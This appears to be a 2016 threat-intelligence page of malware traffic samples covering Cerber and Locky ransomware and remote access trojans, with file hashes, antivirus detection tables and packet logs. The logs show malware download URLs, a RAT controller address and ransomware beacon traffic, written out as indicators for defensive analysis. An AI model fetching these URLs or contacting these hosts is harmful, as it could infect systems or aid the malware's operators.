Ransomware Vector Variant Unknown Onenote.net PCAP file download traffic sample

SHA256: 87fad71988400eefc2139cc3a3616fa21f683290b73247bc2b9ba37bba54e636
File name: ubaupn
Detection ratio: 3 / 54
Analysis date: 2016-12-17 05:38:18 UTC
Antivirus Result Update
CAT-QuickHeal TrojanPWS.ZBot 20161216
TrendMicro Ransom_LOCKYENC.AXFAR 20161217
TrendMicro-HouseCall Ransom_LOCKYENC.AXFAR 20161217

2016-12-16 23:54:44.875193 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [P.], seq 0:288, ack 1, win 64240, length 288: HTTP: GET /ubaupn HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: amaniinitiative.org
Connection: Keep-Alive

2016-12-16 23:54:46.999606 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [P.], seq 288:490, ack 161914, win 62927, length 202: HTTP: GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: amaniinitiative.org
Connection: Keep-Alive

2016-12-16 23:54:47.338390 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [.], ack 162444, win 64240, length 0
2016-12-16 23:54:52.275637 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [.], ack 162445, win 64240, length 0
2016-12-16 23:54:52.277577 IP 192.168.1.102.59998 > 198.105.221.209.80: Flags [F.], seq 490, ack 162445, win 64240, length 0
2016-12-16 23:56:39.349925 IP 192.168.1.102.56466 > 75.75.75.75.53: 35821+ A? cdn.onenote.net. (33)

111.67.197.151.6666 RAT Remote Access Trojan Malware Trojan PCAP File Download Traffic Sample

SHA256:     028f3aff1bbb9bdc57fd0ed7bff829b12a6f47872655f85e49001624ddb57e94
File name:     NewRat.exe
Detection ratio:     50 / 56
Analysis date:     2016-12-17 01:49:07 UTC

Antivirus     Result     Update
ALYac     Generic.ServStart2.B7BD945B     20161217
AVG     Atros.BOTV     20161216
AVware     BehavesLike.Win32.Malware.wsc (mx-v)     20161217
Ad-Aware     Generic.ServStart2.B7BD945B     20161217
AegisLab     Troj.W32.Gen.mner     20161216
AhnLab-V3     Trojan/Win32.Regrun.R153612     20161216
Antiy-AVL     Trojan[:HEUR]/Win32.AGeneric     20161217
Arcabit     Generic.ServStart2.B7BD945B     20161217
Avast     Win32:Malware-gen     20161217
Avira (no cloud)     TR/Dldr.Yemrok.aona     20161216
Baidu     Win32.Trojan.ServStart.aw     20161207
BitDefender     Generic.ServStart2.B7BD945B     20161217
Bkav     W32.Clodf83.Trojan.75df     20161216
Comodo     TrojWare.Win32.GameThief.Magania.~NWABI     20161216
CrowdStrike Falcon (ML)     malicious_confidence_100% (W)     20161024
Cyren     W32/NewMalware-Rootkit-I-based!     20161217

2016-12-16 22:10:42.464406 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [P.], seq 0:285, ack 1, win 256, length 285: HTTP: GET /NewRat.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.xyd2.vip
Connection: Keep-Alive

2016-12-16 22:10:42.771947 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 2921, win 256, length 0
2016-12-16 22:10:43.055447 IP 192.168.1.102.59577 > 123.1.157.146.80: Flags [.], ack 5841, win 256, length 0

2016-12-16 22:11:04.979590 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [S], seq 3889994307, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 22:11:05.234889 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 3576552473, win 256, length 0
2016-12-16 22:11:05.247183 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [P.], seq 0:1164, ack 1, win 256, length 1164

2016-12-16 22:13:12.678256 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 7781, win 256, length 0
2016-12-16 22:13:13.731458 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2184:2623, ack 7781, win 256, length 439: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=70904-113270
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

2016-12-16 22:13:13.771889 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [.], ack 9337, win 256, length 0
2016-12-16 22:13:14.795676 IP 192.168.1.102.59586 > 216.58.217.174.80: Flags [P.], seq 2623:3063, ack 9337, win 256, length 440: HTTP: GET /edgedl/release2/93c2c6lma34er8r6lb3ntekrnresjh08hjdgmygbd5jazduckt1jkhlvqnelx75vp5jtdbid37u0iiynwwvvwbdz8yvemt5abv5/GoogleUpdateSetup.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
Range: bytes=113271-202459
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
User-Agent: Microsoft BITS/6.7
Host: redirector.gvt1.com
Connection: Keep-Alive

nnapoakea.top read.php?f=0.dat CERBER Ransomware 35.166.4.* 37.15.20.* 77.1.12.* 91.239.24.* PCAP File Download Traffic Sample

http://nnapoakea.top/read.php?f=0.dat

SHA256:     5a1a12fb2668af622c7882003561c1abff5b99dc9db3d51a55cbfd4dd3d797e9
File name:     read.php?f=0.dat
Detection ratio:     7 / 55
Analysis date:     2016-12-17 01:16:52 UTC

Antivirus     Result     Update
AVware     Trojan.Win32.Generic!BT     20161217
AhnLab-V3     Trojan/Win32.Cerber.R192010     20161216
Bkav     HW32.Packed.F166     20161216
Invincea     virus.win32.sality.at     20161216
Qihoo-360     HEUR/QVM20.1.0000.Malware.Gen     20161217
Symantec     Heur.AdvML.B     20161217
VIPRE     Trojan.Win32.Generic!BT     20161217

SHA256:     5a1a12fb2668af622c7882003561c1abff5b99dc9db3d51a55cbfd4dd3d797e9
File name:     read.php?f=1.dat
Detection ratio:     7 / 55

Antivirus     Result     Update
Invincea     virus.win32.sality.at     20161216
AhnLab-V3     Trojan/Win32.Cerber.R192010     20161216
AVware     Trojan.Win32.Generic!BT     20161217
VIPRE     Trojan.Win32.Generic!BT     20161217
Bkav     HW32.Packed.F166     20161216
Qihoo-360     HEUR/QVM20.1.0000.Malware.Gen     20161217
Symantec     Heur.AdvML.B     20161217

2016-12-17 00:00:18.590572 IP 192.168.1.102.59801 > 75.75.75.75.53: 52283+ A? nnapoakea.top. (31)
2016-12-17 00:00:29.499334 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 288121, win 1003, length 0
2016-12-17 00:00:52.712693 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [P.], seq 292:584, ack 288121, win 1003, length 292: HTTP: GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: nnapoakea.top
Connection: Keep-Alive

2016-12-17 00:00:53.978994 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 291041, win 1003, length 0
2016-12-17 00:00:53.979790 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 293961, win 1003, length 0
2016-12-17 00:00:53.981207 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 296881, win 1003, length 0
2016-12-17 00:00:53.981988 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 299801, win 1003, length 0
2016-12-17 00:00:53.982836 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 302721, win 1003, length 0
2016-12-17 00:00:54.087105 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 305641, win 1003, length 0
2016-12-17 00:00:54.087968 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 308561, win 1003, length 0
2016-12-17 00:00:54.107016 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 323161, win 1003, length 0
2016-12-17 00:00:54.130419 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 331921, win 1003, length 0
2016-12-17 00:00:54.203658 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 334841, win 1003, length 0
2016-12-17 00:00:54.205053 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 337761, win 1003, length 0
2016-12-17 00:00:54.205672 IP 192.168.1.102.60018 > 35.166.4.45.80: Flags [.], ack 340681, win 1003, length 0
2016-12-17 00:01:33.936525 IP 192.168.1.102.50260 > 37.15.20.0.6892: UDP, length 25
2016-12-17 00:01:33.936581 IP 192.168.1.102.50260 > 37.15.20.1.6892: UDP, length 25
2016-12-17 00:01:33.936632 IP 192.168.1.102.50260 > 37.15.20.2.6892: UDP, length 25
2016-12-17 00:01:33.936688 IP 192.168.1.102.50260 > 37.15.20.3.6892: UDP, length 25
2016-12-17 00:01:33.936743 IP 192.168.1.102.50260 > 37.15.20.4.6892: UDP, length 25
2016-12-17 00:01:33.936750 IP 192.168.1.102.50260 > 37.15.20.5.6892: UDP, length 25
2016-12-17 00:01:33.936799 IP 192.168.1.102.50260 > 37.15.20.6.6892: UDP, length 25
2016-12-17 00:01:33.936890 IP 192.168.1.102.50260 > 37.15.20.7.6892: UDP, length 25
2016-12-17 00:01:33.936943 IP 192.168.1.102.50260 > 37.15.20.8.6892: UDP, length 25
2016-12-17 00:01:33.936951 IP 192.168.1.102.50260 > 37.15.20.9.6892: UDP, length 25
2016-12-17 00:01:33.937054 IP 192.168.1.102.50260 > 37.15.20.10.6892: UDP, length 25
2016-12-17 00:01:33.937063 IP 192.168.1.102.50260 > 37.15.20.11.6892: UDP, length 25
2016-12-17 00:01:33.937113 IP 192.168.1.102.50260 > 37.15.20.12.6892: UDP, length 25
2016-12-17 00:01:33.937195 IP 192.168.1.102.50260 > 37.15.20.13.6892: UDP, length 25
2016-12-17 00:01:33.937250 IP 192.168.1.102.50260 > 37.15.20.14.6892: UDP, length 25
2016-12-17 00:01:33.937257 IP 192.168.1.102.50260 > 37.15.20.15.6892: UDP, length 25
2016-12-17 00:01:33.937305 IP 192.168.1.102.50260 > 37.15.20.16.6892: UDP, length 25
2016-12-17 00:01:33.938748 IP 192.168.1.102.50260 > 77.1.12.13.6892: UDP, length 25
2016-12-17 00:01:33.938797 IP 192.168.1.102.50260 > 77.1.12.14.6892: UDP, length 25
2016-12-17 00:01:33.938886 IP 192.168.1.102.50260 > 77.1.12.15.6892: UDP, length 25
2016-12-17 00:01:33.938894 IP 192.168.1.102.50260 > 77.1.12.16.6892: UDP, length 25
2016-12-17 00:01:33.938992 IP 192.168.1.102.50260 > 77.1.12.17.6892: UDP, length 25
2016-12-17 00:01:33.939050 IP 192.168.1.102.50260 > 77.1.12.18.6892: UDP, length 25
2016-12-17 00:01:33.939058 IP 192.168.1.102.50260 > 77.1.12.19.6892: UDP, length 25
2016-12-17 00:01:33.939107 IP 192.168.1.102.50260 > 77.1.12.20.6892: UDP, length 25
2016-12-17 00:01:33.939194 IP 192.168.1.102.50260 > 77.1.12.21.6892: UDP, length 25
2016-12-17 00:01:33.939203 IP 192.168.1.102.50260 > 77.1.12.22.6892: UDP, length 25
2016-12-17 00:01:33.939253 IP 192.168.1.102.50260 > 77.1.12.23.6892: UDP, length 25
2016-12-17 00:01:33.939336 IP 192.168.1.102.50260 > 77.1.12.24.6892: UDP, length 25
2016-12-17 00:01:33.939345 IP 192.168.1.102.50260 > 77.1.12.25.6892: UDP, length 25
2016-12-17 00:01:33.939441 IP 192.168.1.102.50260 > 77.1.12.26.6892: UDP, length 25
2016-12-17 00:01:33.939449 IP 192.168.1.102.50260 > 77.1.12.27.6892: UDP, length 25
2016-12-17 00:01:33.939540 IP 192.168.1.102.50260 > 77.1.12.28.6892: UDP, length 25
2016-12-17 00:01:33.939549 IP 192.168.1.102.50260 > 77.1.12.29.6892: UDP, length 25
2016-12-17 00:01:33.939598 IP 192.168.1.102.50260 > 77.1.12.30.6892: UDP, length 25
2016-12-17 00:01:33.939683 IP 192.168.1.102.50260 > 77.1.12.31.6892: UDP, length 25
2016-12-17 00:01:33.939738 IP 192.168.1.102.50260 > 91.239.24.0.6892: UDP, length 25
2016-12-17 00:01:33.939746 IP 192.168.1.102.50260 > 91.239.24.1.6892: UDP, length 25
2016-12-17 00:01:33.939798 IP 192.168.1.102.50260 > 91.239.24.2.6892: UDP, length 25
2016-12-17 00:01:33.939878 IP 192.168.1.102.50260 > 91.239.24.3.6892: UDP, length 25
2016-12-17 00:01:33.939887 IP 192.168.1.102.50260 > 91.239.24.4.6892: UDP, length 25
2016-12-17 00:01:33.939936 IP 192.168.1.102.50260 > 91.239.24.5.6892: UDP, length 25

aa.exe Leads to unknown Chinese Malware Infection FULL PCAP file download 111.67.197.151 port 6666

SHA256:     b89384e4dcec9c280b145b0f4aa7d05e783449ada227fb51ccbd2f25adfb57ca
File name:     aa.exe
Detection ratio:     24 / 55
Analysis date:     2016-12-17 01:32:37 UTC

Antivirus     Result     Update
AVG     Win32/DH{I4F6gmU?}     20161216
AVware     Trojan.Win32.Generic!BT     20161217
Ad-Aware     Application.Tool.SIY     20161217
AegisLab     Heur.Advml.Gen!c     20161216
Arcabit     Application.Tool.SIY     20161217
Avast     Win32:Malware-gen     20161217
BitDefender     Application.Tool.SIY     20161216
ClamAV     Win.Trojan.Agent-1890258     20161216
DrWeb     Trojan.Siggen7.8058     20161217
ESET-NOD32     Win32/Spy.Agent.PAR     20161217
F-Secure     Application.Tool.SIY     20161217
GData     Application.Tool.SIY     20161217
Jiangmin     Trojan.Agent.aqqh     20161216
K7GW     Riskware ( 0040eff71 )     20161217
Kaspersky     Trojan.Win32.Agent.ijwp     20161216

2016-12-16 22:40:55.281087 IP 192.168.1.102.59699 > 104.214.150.216.80: Flags [P.], seq 0:284, ack 1, win 258, length 284: HTTP: GET /aa.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 104.214.150.216
Connection: Keep-Alive

2016-12-16 22:41:07.611900 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 3576552473, win 256, options [nop,nop,sack 1 {0:1}], length 0

2016-12-16 22:43:58.018666 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [P.], seq 0:186, ack 1, win 256, length 186
2016-12-16 22:43:58.045426 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 2921, win 256, length 0
2016-12-16 22:43:58.049634 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [P.], seq 186:312, ack 3006, win 256, length 126
2016-12-16 22:43:58.071702 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [P.], seq 312:793, ack 3248, win 255, length 481
2016-12-16 22:43:58.399542 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 6168, win 256, length 0
2016-12-16 22:43:58.400811 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 9088, win 256, length 0
2016-12-16 22:43:58.401577 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 11795, win 256, length 0
2016-12-16 22:43:58.453402 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 11829, win 256, length 0
2016-12-16 22:44:07.893502 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {0:1}], length 0
2016-12-16 22:45:58.402490 IP 192.168.1.102.59706 > 54.230.18.110.443: Flags [.], ack 11861, win 256, length 0
2016-12-16 22:47:08.061204 IP 192.168.1.102.59578 > 111.67.197.151.6666: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {0:1}], length 0

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection 4fv3b5.exe Vector FULL PCAP FILE DOWNLOAD Traffic Sample

SHA256: 2f2b2e30abe71f9a93d6ad7418facf0fcc1323fa0017682f254becf99848e43c
File name: 4fv3b5.exe
Detection ratio: 39 / 56
Analysis date: 2016-12-16 08:39:47 UTC
Avira (no cloud) TR/Dropper.btuyq 20161216
BitDefender Trojan.GenericKD.3903694 20161216
Bkav W32.DominasaAST.Trojan 20161215
CAT-QuickHeal TrojanRansom.Zerber 20161216
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
DrWeb Trojan.Encoder.7233 20161216
ESET-NOD32 Win32/Filecoder.Cerber.C 20161216
Emsisoft Trojan.GenericKD.3903694 (B) 20161216
F-Secure Trojan.GenericKD.3903694 20161216
Fortinet W32/Malicious_Behavior.VEX 20161216
GData Trojan.GenericKD.3903694 20161216
K7AntiVirus Trojan ( 004ff8881 ) 20161216
K7GW Trojan ( 004ff8881 ) 20161216
Kaspersky Trojan-Ransom.Win32.Zerber.apnm 20161216
Malwarebytes Ransom.Locky 20161216
McAfee Generic.atf 20161216
McAfee-GW-Edition BehavesLike.Win32.Ransom.dc 20161216
eScan Trojan.GenericKD.3903694 20161216
Microsoft Ransom:Win32/Genasom!rfn 20161216

btc.blockr.io displays a page on how to pay to get your data back, and Cerber includes a speech component that announces that your data has been encrypted and that you must follow the instructions to get your information back:

Example of files that were encrypted and protected:

The domain name ftoxmpdipwobp4qy.joa688.top returned NXDOMAIN and was not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.monitorspeakers.net
Connection: Keep-Alive

2016-12-16 01:29:06.602141 IP 192.168.1.102.50077 > 216.58.218.234.443: Flags [.], seq 1936354787:1936354788, ack 530483529, win 254, length 1
2016-12-16 01:29:09.071199 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [.], ack 255316, win 735, length 0
2016-12-16 01:29:16.674408 IP 192.168.1.102.59297 > 15.49.2.0.6892: UDP, length 10
2016-12-16 01:29:16.675018 IP 192.168.1.102.59297 > 15.49.2.1.6892: UDP, length 10
2016-12-16 01:29:16.675047 IP 192.168.1.102.59297 > 15.49.2.2.6892: UDP, length 10
2016-12-16 01:29:16.675052 IP 192.168.1.102.59297 > 15.49.2.3.6892: UDP, length 10
2016-12-16 01:29:16.675175 IP 192.168.1.102.59297 > 15.49.2.4.6892: UDP, length 10
2016-12-16 01:29:16.675185 IP 192.168.1.102.59297 > 15.49.2.5.6892: UDP, length 10
2016-12-16 01:29:16.675235 IP 192.168.1.102.59297 > 15.49.2.6.6892: UDP, length 10
2016-12-16 01:29:16.675256 IP 192.168.1.102.59297 > 15.49.2.7.6892: UDP, length 10
2016-12-16 01:29:16.675334 IP 192.168.1.102.59297 > 15.49.2.8.6892: UDP, length 10
2016-12-16 01:29:16.675343 IP 192.168.1.102.59297 > 15.49.2.9.6892: UDP, length 10
2016-12-16 01:29:16.675437 IP 192.168.1.102.59297 > 15.49.2.10.6892: UDP, length 10
2016-12-16 01:29:16.675444 IP 192.168.1.102.59297 > 15.49.2.11.6892: UDP, length 10
2016-12-16 01:29:16.675595 IP 192.168.1.102.59297 > 15.49.2.12.6892: UDP, length 10
2016-12-16 01:29:16.675610 IP 192.168.1.102.59297 > 15.49.2.13.6892: UDP, length 10
2016-12-16 01:29:16.675616 IP 192.168.1.102.59297 > 15.49.2.14.6892: UDP, length 10
2016-12-16 01:29:16.675651 IP 192.168.1.102.59297 > 15.49.2.15.6892: UDP, length 10

2016-12-16 01:29:16.676470 IP 192.168.1.102.59297 > 122.1.13.0.6892: UDP, length 10
2016-12-16 01:29:16.676519 IP 192.168.1.102.59297 > 122.1.13.1.6892: UDP, length 10
2016-12-16 01:29:16.676602 IP 192.168.1.102.59297 > 122.1.13.2.6892: UDP, length 10
2016-12-16 01:29:16.676655 IP 192.168.1.102.59297 > 122.1.13.3.6892: UDP, length 10
2016-12-16 01:29:16.676708 IP 192.168.1.102.59297 > 122.1.13.4.6892: UDP, length 10
2016-12-16 01:29:16.676714 IP 192.168.1.102.59297 > 122.1.13.5.6892: UDP, length 10
2016-12-16 01:29:16.676763 IP 192.168.1.102.59297 > 122.1.13.6.6892: UDP, length 10
2016-12-16 01:29:16.676849 IP 192.168.1.102.59297 > 122.1.13.7.6892: UDP, length 10
2016-12-16 01:29:16.676901 IP 192.168.1.102.59297 > 122.1.13.8.6892: UDP, length 10
2016-12-16 01:29:16.676907 IP 192.168.1.102.59297 > 122.1.13.9.6892: UDP, length 10
2016-12-16 01:29:16.676956 IP 192.168.1.102.59297 > 122.1.13.10.6892: UDP, length 10
2016-12-16 01:29:16.677043 IP 192.168.1.102.59297 > 122.1.13.11.6892: UDP, length 10
2016-12-16 01:29:16.677097 IP 192.168.1.102.59297 > 122.1.13.12.6892: UDP, length 10
2016-12-16 01:29:16.677103 IP 192.168.1.102.59297 > 122.1.13.13.6892: UDP, length 10
2016-12-16 01:29:16.677150 IP 192.168.1.102.59297 > 122.1.13.14.6892: UDP, length 10
2016-12-16 01:29:16.677234 IP 192.168.1.102.59297 > 122.1.13.15.6892: UDP, length 10
2016-12-16 01:29:16.677288 IP 192.168.1.102.59297 > 122.1.13.16.6892: UDP, length 10
2016-12-16 01:29:16.677294 IP 192.168.1.102.59297 > 122.1.13.17.6892: UDP, length 10
2016-12-16 01:29:16.677391 IP 192.168.1.102.59297 > 122.1.13.18.6892: UDP, length 10

2016-12-16 01:29:16.678089 IP 192.168.1.102.59297 > 194.165.16.1.6892: UDP, length 10
2016-12-16 01:29:16.678161 IP 192.168.1.102.59297 > 194.165.16.2.6892: UDP, length 10
2016-12-16 01:29:16.678172 IP 192.168.1.102.59297 > 194.165.16.3.6892: UDP, length 10
2016-12-16 01:29:16.678223 IP 192.168.1.102.59297 > 194.165.16.4.6892: UDP, length 10
2016-12-16 01:29:16.678305 IP 192.168.1.102.59297 > 194.165.16.5.6892: UDP, length 10
2016-12-16 01:29:16.678357 IP 192.168.1.102.59297 > 194.165.16.6.6892: UDP, length 10
2016-12-16 01:29:16.678363 IP 192.168.1.102.59297 > 194.165.16.7.6892: UDP, length 10
2016-12-16 01:29:16.678411 IP 192.168.1.102.59297 > 194.165.16.8.6892: UDP, length 10
2016-12-16 01:29:16.678497 IP 192.168.1.102.59297 > 194.165.16.9.6892: UDP, length 10
2016-12-16 01:29:16.678550 IP 192.168.1.102.59297 > 194.165.16.10.6892: UDP, length 10
2016-12-16 01:29:16.678556 IP 192.168.1.102.59297 > 194.165.16.11.6892: UDP, length 10
2016-12-16 01:29:16.678653 IP 192.168.1.102.59297 > 194.165.16.12.6892: UDP, length 10
2016-12-16 01:29:16.678659 IP 192.168.1.102.59297 > 194.165.16.13.6892: UDP, length 10
2016-12-16 01:29:16.678737 IP 192.168.1.102.59297 > 194.165.16.14.6892: UDP, length 10
2016-12-16 01:29:16.678791 IP 192.168.1.102.59297 > 194.165.16.15.6892: UDP, length 10
2016-12-16 01:29:16.678797 IP 192.168.1.102.59297 > 194.165.16.16.6892: UDP, length 10
2016-12-16 01:29:16.678845 IP 192.168.1.102.59297 > 194.165.16.17.6892: UDP, length 10
2016-12-16 01:29:16.678930 IP 192.168.1.102.59297 > 194.165.16.18.6892: UDP, length 10
2016-12-16 01:29:16.678982 IP 192.168.1.102.59297 > 194.165.16.19.6892: UDP, length 10

2016-12-16 01:29:17.684432 IP 192.168.1.102.59297 > 194.165.17.0.6892: UDP, length 10
2016-12-16 01:29:17.684438 IP 192.168.1.102.59297 > 194.165.17.1.6892: UDP, length 10
2016-12-16 01:29:17.684476 IP 192.168.1.102.59297 > 194.165.17.2.6892: UDP, length 10
2016-12-16 01:29:17.684598 IP 192.168.1.102.59297 > 194.165.17.3.6892: UDP, length 10
2016-12-16 01:29:17.684620 IP 192.168.1.102.59297 > 194.165.17.4.6892: UDP, length 10
2016-12-16 01:29:17.684626 IP 192.168.1.102.59297 > 194.165.17.5.6892: UDP, length 10
2016-12-16 01:29:17.684754 IP 192.168.1.102.59297 > 194.165.17.6.6892: UDP, length 10
2016-12-16 01:29:17.684775 IP 192.168.1.102.59297 > 194.165.17.7.6892: UDP, length 10
2016-12-16 01:29:17.684801 IP 192.168.1.102.59297 > 194.165.17.8.6892: UDP, length 10
2016-12-16 01:29:17.684908 IP 192.168.1.102.59297 > 194.165.17.9.6892: UDP, length 10
2016-12-16 01:29:17.684929 IP 192.168.1.102.59297 > 194.165.17.10.6892: UDP, length 10
2016-12-16 01:29:17.684955 IP 192.168.1.102.59297 > 194.165.17.11.6892: UDP, length 10
2016-12-16 01:29:17.685063 IP 192.168.1.102.59297 > 194.165.17.12.6892: UDP, length 10
2016-12-16 01:29:17.685085 IP 192.168.1.102.59297 > 194.165.17.13.6892: UDP, length 10

2016-12-16 01:29:30.058704 IP 192.168.1.102.59298 > 15.49.2.0.6892: UDP, length 24
2016-12-16 01:29:30.058735 IP 192.168.1.102.59298 > 15.49.2.1.6892: UDP, length 24
2016-12-16 01:29:30.058741 IP 192.168.1.102.59298 > 15.49.2.2.6892: UDP, length 24
2016-12-16 01:29:30.058852 IP 192.168.1.102.59298 > 15.49.2.3.6892: UDP, length 24
2016-12-16 01:29:30.058864 IP 192.168.1.102.59298 > 15.49.2.4.6892: UDP, length 24
2016-12-16 01:29:30.058905 IP 192.168.1.102.59298 > 15.49.2.5.6892: UDP, length 24
2016-12-16 01:29:30.059018 IP 192.168.1.102.59298 > 15.49.2.6.6892: UDP, length 24
2016-12-16 01:29:30.059041 IP 192.168.1.102.59298 > 15.49.2.7.6892: UDP, length 24
2016-12-16 01:29:30.059046 IP 192.168.1.102.59298 > 15.49.2.8.6892: UDP, length 24
2016-12-16 01:29:30.059145 IP 192.168.1.102.59298 > 15.49.2.9.6892: UDP, length 24
2016-12-16 01:29:30.059156 IP 192.168.1.102.59298 > 15.49.2.10.6892: UDP, length 24
2016-12-16 01:29:30.059223 IP 192.168.1.102.59298 > 15.49.2.11.6892: UDP, length 24
2016-12-16 01:29:30.059292 IP 192.168.1.102.59298 > 15.49.2.12.6892: UDP, length 24

2016-12-16 01:32:13.634751 IP 192.168.1.102.50425 > 75.75.75.75.53: 35627+ A? ftoxmpdipwobp4qy.joa688.top. (45)

2016-12-16 01:32:14.439186 IP 192.168.1.102.58408 > 75.75.75.75.53: 63853+ A? btc.blockr.io. (31)
2016-12-16 01:32:14.511003 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [S], seq 3315200002, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-12-16 01:32:14.643338 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [.], ack 604253513, win 256, length 0
2016-12-16 01:32:14.647140 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 0:254, ack 1, win 256, length 254: HTTP: GET /api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io/api/v1/address/txs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1481869857757
Connection: Keep-Alive

2016-12-16 01:32:15.111089 IP 192.168.1.102.50106 > 148.251.6.214.80: Flags [P.], seq 254:534, ack 25007, win 256, length 280: HTTP: GET /api/v1/tx/info/60935ef6c71fafa9e30ee56d312dd626999acbcd0c58144ba4286169a41ff4ea?_=1481869858429 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: btc.blockr.io
Connection: Keep-Alive

2016-12-16 01:33:53.309648 IP 192.168.1.102.49833 > 91.121.230.214.443: Flags [.], ack 544, win 948, length 0

The data pulled from the btc.blockr.io link:
